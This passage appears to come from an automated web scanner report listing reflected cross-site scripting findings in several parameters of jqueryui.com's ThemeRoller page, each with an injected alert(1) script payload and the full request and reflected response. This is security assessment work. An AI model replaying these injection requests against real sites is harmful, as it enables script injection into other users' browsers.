GET /themeroller/?ffDefault=Verdana,Arial,sans-serif&fwDefault=normal&fsDefault=1.1em&cornerRadius=5px707ae"><script>alert(1)</script>2116519edf5&bgColorHeader=dadada&bgTextureHeader=03_highlight_soft.png&bgImgOpacityHeader=75&borderColorHeader=aaaaaa&fcHeader=222222&iconColorHeader=222222&bgColorContent=000000&bgTextureContent=01_flat.png&bgImgOpacityContent=75&borderColorContent=aaaaaa&fcContent=ffffff&iconColorContent=222222&bgColorDefault=8F8F8F&bgTextureDefault=04_highlight_hard.png&bgImgOpacityDefault=75&borderColorDefault=999999&fcDefault=000000&iconColorDefault=888888&bgColorHover=dadada&bgTextureHover=04_highlight_hard.png&bgImgOpacityHover=75&borderColorHover=999999&fcHover=000000&iconColorHover=454545&bgColorActive=dadada&bgTextureActive=04_highlight_hard.png&bgImgOpacityActive=75&borderColorActive=999999&fcActive=000000&iconColorActive=454545&bgColorHighlight=fbf9ee&bgTextureHighlight=02_glass.png&bgImgOpacityHighlight=55&borderColorHighlight=fcefa1&fcHighlight=363636&iconColorHighlight=2e83ff&bgColorError=fef1ec&bgTextureError=05_inset_soft.png&bgImgOpacityError=95&borderColorError=cd0a0a&fcError=cd0a0a&iconColorError=cd0a0a&bgColorOverlay=aaaaaa&bgTextureOverlay=01_flat.png&bgImgOpacityOverlay=0&opacityOverlay=30&bgColorShadow=aaaaaa&bgTextureShadow=01_flat.png&bgImgOpacityShadow=0&opacityShadow=30&thicknessShadow=8px&offsetTopShadow=-8px&offsetLeftShadow=-8px&cornerRadiusShadow=8px HTTP/1.1
Host: jqueryui.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Server: nginx/0.7.62
Date: Wed, 06 Jul 2011 11:22:43 GMT
Content-Type: text/html
Connection: close
X-Powered-By: PHP/5.2.4-2ubuntu5.10
X-Served-By: www3
X-Proxy: 2
Content-Length: 120133

<!DOCTYPE html>
<html>
<head>
   <meta charset="UTF-8" />
   <title>jQuery UI - ThemeRoller</title>

   <meta name="keywords" content="jquery,user interface,ui,widgets,interaction,javascript" />
   <meta nam
...[SNIP]...
<link rel="stylesheet" href="/themeroller/css/parseTheme.css.php?ctl=themeroller&ffDefault=Verdana,Arial,sans-serif&fwDefault=normal&fsDefault=1.1em&cornerRadius=5px707ae"><script>alert(1)</script>2116519edf5&bgColorHeader=dadada&bgTextureHeader=03_highlight_soft.png&bgImgOpacityHeader=75&borderColorHeader=aaaaaa&fcHeader=222222&iconColorHeader=222222&bgColorContent=000000&bgTextureContent=01_flat.png&bgIm
...[SNIP]...

2.60. http://jqueryui.com/themeroller/ [cornerRadiusShadow parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://jqueryui.com
Path:	/themeroller/

Issue detail

The value of the cornerRadiusShadow request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 67b25"><script>alert(1)</script>6776f4259fb was submitted in the cornerRadiusShadow parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /themeroller/?ffDefault=Verdana,Arial,sans-serif&fwDefault=normal&fsDefault=1.1em&cornerRadius=5px&bgColorHeader=dadada&bgTextureHeader=03_highlight_soft.png&bgImgOpacityHeader=75&borderColorHeader=aaaaaa&fcHeader=222222&iconColorHeader=222222&bgColorContent=000000&bgTextureContent=01_flat.png&bgImgOpacityContent=75&borderColorContent=aaaaaa&fcContent=ffffff&iconColorContent=222222&bgColorDefault=8F8F8F&bgTextureDefault=04_highlight_hard.png&bgImgOpacityDefault=75&borderColorDefault=999999&fcDefault=000000&iconColorDefault=888888&bgColorHover=dadada&bgTextureHover=04_highlight_hard.png&bgImgOpacityHover=75&borderColorHover=999999&fcHover=000000&iconColorHover=454545&bgColorActive=dadada&bgTextureActive=04_highlight_hard.png&bgImgOpacityActive=75&borderColorActive=999999&fcActive=000000&iconColorActive=454545&bgColorHighlight=fbf9ee&bgTextureHighlight=02_glass.png&bgImgOpacityHighlight=55&borderColorHighlight=fcefa1&fcHighlight=363636&iconColorHighlight=2e83ff&bgColorError=fef1ec&bgTextureError=05_inset_soft.png&bgImgOpacityError=95&borderColorError=cd0a0a&fcError=cd0a0a&iconColorError=cd0a0a&bgColorOverlay=aaaaaa&bgTextureOverlay=01_flat.png&bgImgOpacityOverlay=0&opacityOverlay=30&bgColorShadow=aaaaaa&bgTextureShadow=01_flat.png&bgImgOpacityShadow=0&opacityShadow=30&thicknessShadow=8px&offsetTopShadow=-8px&offsetLeftShadow=-8px&cornerRadiusShadow=8px67b25"><script>alert(1)</script>6776f4259fb HTTP/1.1
Host: jqueryui.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Server: nginx/0.7.62
Date: Wed, 06 Jul 2011 11:23:26 GMT
Content-Type: text/html
Connection: close
X-Powered-By: PHP/5.2.4-2ubuntu5.10
X-Served-By: www4
X-Proxy: 2
Content-Length: 120133

<!DOCTYPE html>
<html>
<head>
   <meta charset="UTF-8" />
   <title>jQuery UI - ThemeRoller</title>

   <meta name="keywords" content="jquery,user interface,ui,widgets,interaction,javascript" />
   <meta nam
...[SNIP]...
yOverlay=0&opacityOverlay=30&bgColorShadow=aaaaaa&bgTextureShadow=01_flat.png&bgImgOpacityShadow=0&opacityShadow=30&thicknessShadow=8px&offsetTopShadow=-8px&offsetLeftShadow=-8px&cornerRadiusShadow=8px67b25"><script>alert(1)</script>6776f4259fb" type="text/css" media="all" />
...[SNIP]...

2.61. http://jqueryui.com/themeroller/ [fcActive parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://jqueryui.com
Path:	/themeroller/

Issue detail

The value of the fcActive request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 1a818"><script>alert(1)</script>bc6a78482e was submitted in the fcActive parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /themeroller/?ffDefault=Verdana,Arial,sans-serif&fwDefault=normal&fsDefault=1.1em&cornerRadius=5px&bgColorHeader=dadada&bgTextureHeader=03_highlight_soft.png&bgImgOpacityHeader=75&borderColorHeader=aaaaaa&fcHeader=222222&iconColorHeader=222222&bgColorContent=000000&bgTextureContent=01_flat.png&bgImgOpacityContent=75&borderColorContent=aaaaaa&fcContent=ffffff&iconColorContent=222222&bgColorDefault=8F8F8F&bgTextureDefault=04_highlight_hard.png&bgImgOpacityDefault=75&borderColorDefault=999999&fcDefault=000000&iconColorDefault=888888&bgColorHover=dadada&bgTextureHover=04_highlight_hard.png&bgImgOpacityHover=75&borderColorHover=999999&fcHover=000000&iconColorHover=454545&bgColorActive=dadada&bgTextureActive=04_highlight_hard.png&bgImgOpacityActive=75&borderColorActive=999999&fcActive=0000001a818"><script>alert(1)</script>bc6a78482e&iconColorActive=454545&bgColorHighlight=fbf9ee&bgTextureHighlight=02_glass.png&bgImgOpacityHighlight=55&borderColorHighlight=fcefa1&fcHighlight=363636&iconColorHighlight=2e83ff&bgColorError=fef1ec&bgTextureError=05_inset_soft.png&bgImgOpacityError=95&borderColorError=cd0a0a&fcError=cd0a0a&iconColorError=cd0a0a&bgColorOverlay=aaaaaa&bgTextureOverlay=01_flat.png&bgImgOpacityOverlay=0&opacityOverlay=30&bgColorShadow=aaaaaa&bgTextureShadow=01_flat.png&bgImgOpacityShadow=0&opacityShadow=30&thicknessShadow=8px&offsetTopShadow=-8px&offsetLeftShadow=-8px&cornerRadiusShadow=8px HTTP/1.1
Host: jqueryui.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Server: nginx/0.7.62
Date: Wed, 06 Jul 2011 11:23:06 GMT
Content-Type: text/html
Connection: close
X-Powered-By: PHP/5.2.4-2ubuntu5.10
X-Served-By: www3
X-Proxy: 2
Content-Length: 120130

<!DOCTYPE html>
<html>
<head>
   <meta charset="UTF-8" />
   <title>jQuery UI - ThemeRoller</title>

   <meta name="keywords" content="jquery,user interface,ui,widgets,interaction,javascript" />
   <meta nam
...[SNIP]...
ImgOpacityHover=75&borderColorHover=999999&fcHover=000000&iconColorHover=454545&bgColorActive=dadada&bgTextureActive=04_highlight_hard.png&bgImgOpacityActive=75&borderColorActive=999999&fcActive=0000001a818"><script>alert(1)</script>bc6a78482e&iconColorActive=454545&bgColorHighlight=fbf9ee&bgTextureHighlight=02_glass.png&bgImgOpacityHighlight=55&borderColorHighlight=fcefa1&fcHighlight=363636&iconColorHighlight=2e83ff&bgColorError=fef1ec&bgT
...[SNIP]...

2.62. http://jqueryui.com/themeroller/ [fcContent parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://jqueryui.com
Path:	/themeroller/

Issue detail

The value of the fcContent request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 276ad"><script>alert(1)</script>5df8c0fde9e was submitted in the fcContent parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /themeroller/?ffDefault=Verdana,Arial,sans-serif&fwDefault=normal&fsDefault=1.1em&cornerRadius=5px&bgColorHeader=dadada&bgTextureHeader=03_highlight_soft.png&bgImgOpacityHeader=75&borderColorHeader=aaaaaa&fcHeader=222222&iconColorHeader=222222&bgColorContent=000000&bgTextureContent=01_flat.png&bgImgOpacityContent=75&borderColorContent=aaaaaa&fcContent=ffffff276ad"><script>alert(1)</script>5df8c0fde9e&iconColorContent=222222&bgColorDefault=8F8F8F&bgTextureDefault=04_highlight_hard.png&bgImgOpacityDefault=75&borderColorDefault=999999&fcDefault=000000&iconColorDefault=888888&bgColorHover=dadada&bgTextureHover=04_highlight_hard.png&bgImgOpacityHover=75&borderColorHover=999999&fcHover=000000&iconColorHover=454545&bgColorActive=dadada&bgTextureActive=04_highlight_hard.png&bgImgOpacityActive=75&borderColorActive=999999&fcActive=000000&iconColorActive=454545&bgColorHighlight=fbf9ee&bgTextureHighlight=02_glass.png&bgImgOpacityHighlight=55&borderColorHighlight=fcefa1&fcHighlight=363636&iconColorHighlight=2e83ff&bgColorError=fef1ec&bgTextureError=05_inset_soft.png&bgImgOpacityError=95&borderColorError=cd0a0a&fcError=cd0a0a&iconColorError=cd0a0a&bgColorOverlay=aaaaaa&bgTextureOverlay=01_flat.png&bgImgOpacityOverlay=0&opacityOverlay=30&bgColorShadow=aaaaaa&bgTextureShadow=01_flat.png&bgImgOpacityShadow=0&opacityShadow=30&thicknessShadow=8px&offsetTopShadow=-8px&offsetLeftShadow=-8px&cornerRadiusShadow=8px HTTP/1.1
Host: jqueryui.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Server: nginx/0.7.62
Date: Wed, 06 Jul 2011 11:22:52 GMT
Content-Type: text/html
Connection: close
X-Powered-By: PHP/5.2.4-2ubuntu5.10
X-Served-By: www3
X-Proxy: 2
Content-Length: 120133

<!DOCTYPE html>
<html>
<head>
   <meta charset="UTF-8" />
   <title>jQuery UI - ThemeRoller</title>

   <meta name="keywords" content="jquery,user interface,ui,widgets,interaction,javascript" />
   <meta nam
...[SNIP]...
gImgOpacityHeader=75&borderColorHeader=aaaaaa&fcHeader=222222&iconColorHeader=222222&bgColorContent=000000&bgTextureContent=01_flat.png&bgImgOpacityContent=75&borderColorContent=aaaaaa&fcContent=ffffff276ad"><script>alert(1)</script>5df8c0fde9e&iconColorContent=222222&bgColorDefault=8F8F8F&bgTextureDefault=04_highlight_hard.png&bgImgOpacityDefault=75&borderColorDefault=999999&fcDefault=000000&iconColorDefault=888888&bgColorHover=dadada&bgTex
...[SNIP]...

2.63. http://jqueryui.com/themeroller/ [fcDefault parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://jqueryui.com
Path:	/themeroller/

Issue detail

The value of the fcDefault request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload a68fa"><script>alert(1)</script>a39040d10a4 was submitted in the fcDefault parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /themeroller/?ffDefault=Verdana,Arial,sans-serif&fwDefault=normal&fsDefault=1.1em&cornerRadius=5px&bgColorHeader=dadada&bgTextureHeader=03_highlight_soft.png&bgImgOpacityHeader=75&borderColorHeader=aaaaaa&fcHeader=222222&iconColorHeader=222222&bgColorContent=000000&bgTextureContent=01_flat.png&bgImgOpacityContent=75&borderColorContent=aaaaaa&fcContent=ffffff&iconColorContent=222222&bgColorDefault=8F8F8F&bgTextureDefault=04_highlight_hard.png&bgImgOpacityDefault=75&borderColorDefault=999999&fcDefault=000000a68fa"><script>alert(1)</script>a39040d10a4&iconColorDefault=888888&bgColorHover=dadada&bgTextureHover=04_highlight_hard.png&bgImgOpacityHover=75&borderColorHover=999999&fcHover=000000&iconColorHover=454545&bgColorActive=dadada&bgTextureActive=04_highlight_hard.png&bgImgOpacityActive=75&borderColorActive=999999&fcActive=000000&iconColorActive=454545&bgColorHighlight=fbf9ee&bgTextureHighlight=02_glass.png&bgImgOpacityHighlight=55&borderColorHighlight=fcefa1&fcHighlight=363636&iconColorHighlight=2e83ff&bgColorError=fef1ec&bgTextureError=05_inset_soft.png&bgImgOpacityError=95&borderColorError=cd0a0a&fcError=cd0a0a&iconColorError=cd0a0a&bgColorOverlay=aaaaaa&bgTextureOverlay=01_flat.png&bgImgOpacityOverlay=0&opacityOverlay=30&bgColorShadow=aaaaaa&bgTextureShadow=01_flat.png&bgImgOpacityShadow=0&opacityShadow=30&thicknessShadow=8px&offsetTopShadow=-8px&offsetLeftShadow=-8px&cornerRadiusShadow=8px HTTP/1.1
Host: jqueryui.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Server: nginx/0.7.62
Date: Wed, 06 Jul 2011 11:22:57 GMT
Content-Type: text/html
Connection: close
X-Powered-By: PHP/5.2.4-2ubuntu5.10
X-Served-By: www3
X-Proxy: 2
Content-Length: 120133

<!DOCTYPE html>
<html>
<head>
   <meta charset="UTF-8" />
   <title>jQuery UI - ThemeRoller</title>

   <meta name="keywords" content="jquery,user interface,ui,widgets,interaction,javascript" />
   <meta nam
...[SNIP]...
tent=75&borderColorContent=aaaaaa&fcContent=ffffff&iconColorContent=222222&bgColorDefault=8F8F8F&bgTextureDefault=04_highlight_hard.png&bgImgOpacityDefault=75&borderColorDefault=999999&fcDefault=000000a68fa"><script>alert(1)</script>a39040d10a4&iconColorDefault=888888&bgColorHover=dadada&bgTextureHover=04_highlight_hard.png&bgImgOpacityHover=75&borderColorHover=999999&fcHover=000000&iconColorHover=454545&bgColorActive=dadada&bgTextureActive=
...[SNIP]...

2.64. http://jqueryui.com/themeroller/ [fcError parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://jqueryui.com
Path:	/themeroller/

Issue detail

The value of the fcError request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload b805c"><script>alert(1)</script>db7f5730f61 was submitted in the fcError parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /themeroller/?ffDefault=Verdana,Arial,sans-serif&fwDefault=normal&fsDefault=1.1em&cornerRadius=5px&bgColorHeader=dadada&bgTextureHeader=03_highlight_soft.png&bgImgOpacityHeader=75&borderColorHeader=aaaaaa&fcHeader=222222&iconColorHeader=222222&bgColorContent=000000&bgTextureContent=01_flat.png&bgImgOpacityContent=75&borderColorContent=aaaaaa&fcContent=ffffff&iconColorContent=222222&bgColorDefault=8F8F8F&bgTextureDefault=04_highlight_hard.png&bgImgOpacityDefault=75&borderColorDefault=999999&fcDefault=000000&iconColorDefault=888888&bgColorHover=dadada&bgTextureHover=04_highlight_hard.png&bgImgOpacityHover=75&borderColorHover=999999&fcHover=000000&iconColorHover=454545&bgColorActive=dadada&bgTextureActive=04_highlight_hard.png&bgImgOpacityActive=75&borderColorActive=999999&fcActive=000000&iconColorActive=454545&bgColorHighlight=fbf9ee&bgTextureHighlight=02_glass.png&bgImgOpacityHighlight=55&borderColorHighlight=fcefa1&fcHighlight=363636&iconColorHighlight=2e83ff&bgColorError=fef1ec&bgTextureError=05_inset_soft.png&bgImgOpacityError=95&borderColorError=cd0a0a&fcError=cd0a0ab805c"><script>alert(1)</script>db7f5730f61&iconColorError=cd0a0a&bgColorOverlay=aaaaaa&bgTextureOverlay=01_flat.png&bgImgOpacityOverlay=0&opacityOverlay=30&bgColorShadow=aaaaaa&bgTextureShadow=01_flat.png&bgImgOpacityShadow=0&opacityShadow=30&thicknessShadow=8px&offsetTopShadow=-8px&offsetLeftShadow=-8px&cornerRadiusShadow=8px HTTP/1.1
Host: jqueryui.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Server: nginx/0.7.62
Date: Wed, 06 Jul 2011 11:23:16 GMT
Content-Type: text/html
Connection: close
X-Powered-By: PHP/5.2.4-2ubuntu5.10
X-Served-By: www3
X-Proxy: 2
Content-Length: 120133

<!DOCTYPE html>
<html>
<head>
   <meta charset="UTF-8" />
   <title>jQuery UI - ThemeRoller</title>

   <meta name="keywords" content="jquery,user interface,ui,widgets,interaction,javascript" />
   <meta nam
...[SNIP]...
ityHighlight=55&borderColorHighlight=fcefa1&fcHighlight=363636&iconColorHighlight=2e83ff&bgColorError=fef1ec&bgTextureError=05_inset_soft.png&bgImgOpacityError=95&borderColorError=cd0a0a&fcError=cd0a0ab805c"><script>alert(1)</script>db7f5730f61&iconColorError=cd0a0a&bgColorOverlay=aaaaaa&bgTextureOverlay=01_flat.png&bgImgOpacityOverlay=0&opacityOverlay=30&bgColorShadow=aaaaaa&bgTextureShadow=01_flat.png&bgImgOpacityShadow=0&opacityShadow=30&
...[SNIP]...

2.65. http://jqueryui.com/themeroller/ [fcHeader parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://jqueryui.com
Path:	/themeroller/

Issue detail

The value of the fcHeader request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload f8cda"><script>alert(1)</script>529d59993df was submitted in the fcHeader parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /themeroller/?ffDefault=Verdana,Arial,sans-serif&fwDefault=normal&fsDefault=1.1em&cornerRadius=5px&bgColorHeader=dadada&bgTextureHeader=03_highlight_soft.png&bgImgOpacityHeader=75&borderColorHeader=aaaaaa&fcHeader=222222f8cda"><script>alert(1)</script>529d59993df&iconColorHeader=222222&bgColorContent=000000&bgTextureContent=01_flat.png&bgImgOpacityContent=75&borderColorContent=aaaaaa&fcContent=ffffff&iconColorContent=222222&bgColorDefault=8F8F8F&bgTextureDefault=04_highlight_hard.png&bgImgOpacityDefault=75&borderColorDefault=999999&fcDefault=000000&iconColorDefault=888888&bgColorHover=dadada&bgTextureHover=04_highlight_hard.png&bgImgOpacityHover=75&borderColorHover=999999&fcHover=000000&iconColorHover=454545&bgColorActive=dadada&bgTextureActive=04_highlight_hard.png&bgImgOpacityActive=75&borderColorActive=999999&fcActive=000000&iconColorActive=454545&bgColorHighlight=fbf9ee&bgTextureHighlight=02_glass.png&bgImgOpacityHighlight=55&borderColorHighlight=fcefa1&fcHighlight=363636&iconColorHighlight=2e83ff&bgColorError=fef1ec&bgTextureError=05_inset_soft.png&bgImgOpacityError=95&borderColorError=cd0a0a&fcError=cd0a0a&iconColorError=cd0a0a&bgColorOverlay=aaaaaa&bgTextureOverlay=01_flat.png&bgImgOpacityOverlay=0&opacityOverlay=30&bgColorShadow=aaaaaa&bgTextureShadow=01_flat.png&bgImgOpacityShadow=0&opacityShadow=30&thicknessShadow=8px&offsetTopShadow=-8px&offsetLeftShadow=-8px&cornerRadiusShadow=8px HTTP/1.1
Host: jqueryui.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Server: nginx/0.7.62
Date: Wed, 06 Jul 2011 11:22:47 GMT
Content-Type: text/html
Connection: close
X-Powered-By: PHP/5.2.4-2ubuntu5.10
X-Served-By: www4
X-Proxy: 2
Content-Length: 120133

<!DOCTYPE html>
<html>
<head>
   <meta charset="UTF-8" />
   <title>jQuery UI - ThemeRoller</title>

   <meta name="keywords" content="jquery,user interface,ui,widgets,interaction,javascript" />
   <meta nam
...[SNIP]...
ault=Verdana,Arial,sans-serif&fwDefault=normal&fsDefault=1.1em&cornerRadius=5px&bgColorHeader=dadada&bgTextureHeader=03_highlight_soft.png&bgImgOpacityHeader=75&borderColorHeader=aaaaaa&fcHeader=222222f8cda"><script>alert(1)</script>529d59993df&iconColorHeader=222222&bgColorContent=000000&bgTextureContent=01_flat.png&bgImgOpacityContent=75&borderColorContent=aaaaaa&fcContent=ffffff&iconColorContent=222222&bgColorDefault=8F8F8F&bgTextureDefau
...[SNIP]...

2.66. http://jqueryui.com/themeroller/ [fcHighlight parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://jqueryui.com
Path:	/themeroller/

Issue detail

The value of the fcHighlight request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload b0ca7"><script>alert(1)</script>19d3cb864a7 was submitted in the fcHighlight parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /themeroller/?ffDefault=Verdana,Arial,sans-serif&fwDefault=normal&fsDefault=1.1em&cornerRadius=5px&bgColorHeader=dadada&bgTextureHeader=03_highlight_soft.png&bgImgOpacityHeader=75&borderColorHeader=aaaaaa&fcHeader=222222&iconColorHeader=222222&bgColorContent=000000&bgTextureContent=01_flat.png&bgImgOpacityContent=75&borderColorContent=aaaaaa&fcContent=ffffff&iconColorContent=222222&bgColorDefault=8F8F8F&bgTextureDefault=04_highlight_hard.png&bgImgOpacityDefault=75&borderColorDefault=999999&fcDefault=000000&iconColorDefault=888888&bgColorHover=dadada&bgTextureHover=04_highlight_hard.png&bgImgOpacityHover=75&borderColorHover=999999&fcHover=000000&iconColorHover=454545&bgColorActive=dadada&bgTextureActive=04_highlight_hard.png&bgImgOpacityActive=75&borderColorActive=999999&fcActive=000000&iconColorActive=454545&bgColorHighlight=fbf9ee&bgTextureHighlight=02_glass.png&bgImgOpacityHighlight=55&borderColorHighlight=fcefa1&fcHighlight=363636b0ca7"><script>alert(1)</script>19d3cb864a7&iconColorHighlight=2e83ff&bgColorError=fef1ec&bgTextureError=05_inset_soft.png&bgImgOpacityError=95&borderColorError=cd0a0a&fcError=cd0a0a&iconColorError=cd0a0a&bgColorOverlay=aaaaaa&bgTextureOverlay=01_flat.png&bgImgOpacityOverlay=0&opacityOverlay=30&bgColorShadow=aaaaaa&bgTextureShadow=01_flat.png&bgImgOpacityShadow=0&opacityShadow=30&thicknessShadow=8px&offsetTopShadow=-8px&offsetLeftShadow=-8px&cornerRadiusShadow=8px HTTP/1.1
Host: jqueryui.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Server: nginx/0.7.62
Date: Wed, 06 Jul 2011 11:23:11 GMT
Content-Type: text/html
Connection: close
X-Powered-By: PHP/5.2.4-2ubuntu5.10
X-Served-By: www4
X-Proxy: 2
Content-Length: 120133

<!DOCTYPE html>
<html>
<head>
   <meta charset="UTF-8" />
   <title>jQuery UI - ThemeRoller</title>

   <meta name="keywords" content="jquery,user interface,ui,widgets,interaction,javascript" />
   <meta nam
...[SNIP]...
Active=75&borderColorActive=999999&fcActive=000000&iconColorActive=454545&bgColorHighlight=fbf9ee&bgTextureHighlight=02_glass.png&bgImgOpacityHighlight=55&borderColorHighlight=fcefa1&fcHighlight=363636b0ca7"><script>alert(1)</script>19d3cb864a7&iconColorHighlight=2e83ff&bgColorError=fef1ec&bgTextureError=05_inset_soft.png&bgImgOpacityError=95&borderColorError=cd0a0a&fcError=cd0a0a&iconColorError=cd0a0a&bgColorOverlay=aaaaaa&bgTextureOverlay=
...[SNIP]...

2.67. http://jqueryui.com/themeroller/ [fcHover parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://jqueryui.com
Path:	/themeroller/

Issue detail

The value of the fcHover request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload ec9bd"><script>alert(1)</script>b1d6a495bd5 was submitted in the fcHover parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /themeroller/?ffDefault=Verdana,Arial,sans-serif&fwDefault=normal&fsDefault=1.1em&cornerRadius=5px&bgColorHeader=dadada&bgTextureHeader=03_highlight_soft.png&bgImgOpacityHeader=75&borderColorHeader=aaaaaa&fcHeader=222222&iconColorHeader=222222&bgColorContent=000000&bgTextureContent=01_flat.png&bgImgOpacityContent=75&borderColorContent=aaaaaa&fcContent=ffffff&iconColorContent=222222&bgColorDefault=8F8F8F&bgTextureDefault=04_highlight_hard.png&bgImgOpacityDefault=75&borderColorDefault=999999&fcDefault=000000&iconColorDefault=888888&bgColorHover=dadada&bgTextureHover=04_highlight_hard.png&bgImgOpacityHover=75&borderColorHover=999999&fcHover=000000ec9bd"><script>alert(1)</script>b1d6a495bd5&iconColorHover=454545&bgColorActive=dadada&bgTextureActive=04_highlight_hard.png&bgImgOpacityActive=75&borderColorActive=999999&fcActive=000000&iconColorActive=454545&bgColorHighlight=fbf9ee&bgTextureHighlight=02_glass.png&bgImgOpacityHighlight=55&borderColorHighlight=fcefa1&fcHighlight=363636&iconColorHighlight=2e83ff&bgColorError=fef1ec&bgTextureError=05_inset_soft.png&bgImgOpacityError=95&borderColorError=cd0a0a&fcError=cd0a0a&iconColorError=cd0a0a&bgColorOverlay=aaaaaa&bgTextureOverlay=01_flat.png&bgImgOpacityOverlay=0&opacityOverlay=30&bgColorShadow=aaaaaa&bgTextureShadow=01_flat.png&bgImgOpacityShadow=0&opacityShadow=30&thicknessShadow=8px&offsetTopShadow=-8px&offsetLeftShadow=-8px&cornerRadiusShadow=8px HTTP/1.1
Host: jqueryui.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Server: nginx/0.7.62
Date: Wed, 06 Jul 2011 11:23:02 GMT
Content-Type: text/html
Connection: close
X-Powered-By: PHP/5.2.4-2ubuntu5.10
X-Served-By: www4
X-Proxy: 2
Content-Length: 120133

<!DOCTYPE html>
<html>
<head>
   <meta charset="UTF-8" />
   <title>jQuery UI - ThemeRoller</title>

   <meta name="keywords" content="jquery,user interface,ui,widgets,interaction,javascript" />
   <meta nam
...[SNIP]...
OpacityDefault=75&borderColorDefault=999999&fcDefault=000000&iconColorDefault=888888&bgColorHover=dadada&bgTextureHover=04_highlight_hard.png&bgImgOpacityHover=75&borderColorHover=999999&fcHover=000000ec9bd"><script>alert(1)</script>b1d6a495bd5&iconColorHover=454545&bgColorActive=dadada&bgTextureActive=04_highlight_hard.png&bgImgOpacityActive=75&borderColorActive=999999&fcActive=000000&iconColorActive=454545&bgColorHighlight=fbf9ee&bgTexture
...[SNIP]...

2.68. http://jqueryui.com/themeroller/ [ffDefault parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://jqueryui.com
Path:	/themeroller/

Issue detail

The value of the ffDefault request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload e01a9"><script>alert(1)</script>9aceb87732b was submitted in the ffDefault parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /themeroller/?ffDefault=Verdana,Arial,sans-serife01a9"><script>alert(1)</script>9aceb87732b&fwDefault=normal&fsDefault=1.1em&cornerRadius=5px&bgColorHeader=dadada&bgTextureHeader=03_highlight_soft.png&bgImgOpacityHeader=75&borderColorHeader=aaaaaa&fcHeader=222222&iconColorHeader=222222&bgColorContent=000000&bgTextureContent=01_flat.png&bgImgOpacityContent=75&borderColorContent=aaaaaa&fcContent=ffffff&iconColorContent=222222&bgColorDefault=8F8F8F&bgTextureDefault=04_highlight_hard.png&bgImgOpacityDefault=75&borderColorDefault=999999&fcDefault=000000&iconColorDefault=888888&bgColorHover=dadada&bgTextureHover=04_highlight_hard.png&bgImgOpacityHover=75&borderColorHover=999999&fcHover=000000&iconColorHover=454545&bgColorActive=dadada&bgTextureActive=04_highlight_hard.png&bgImgOpacityActive=75&borderColorActive=999999&fcActive=000000&iconColorActive=454545&bgColorHighlight=fbf9ee&bgTextureHighlight=02_glass.png&bgImgOpacityHighlight=55&borderColorHighlight=fcefa1&fcHighlight=363636&iconColorHighlight=2e83ff&bgColorError=fef1ec&bgTextureError=05_inset_soft.png&bgImgOpacityError=95&borderColorError=cd0a0a&fcError=cd0a0a&iconColorError=cd0a0a&bgColorOverlay=aaaaaa&bgTextureOverlay=01_flat.png&bgImgOpacityOverlay=0&opacityOverlay=30&bgColorShadow=aaaaaa&bgTextureShadow=01_flat.png&bgImgOpacityShadow=0&opacityShadow=30&thicknessShadow=8px&offsetT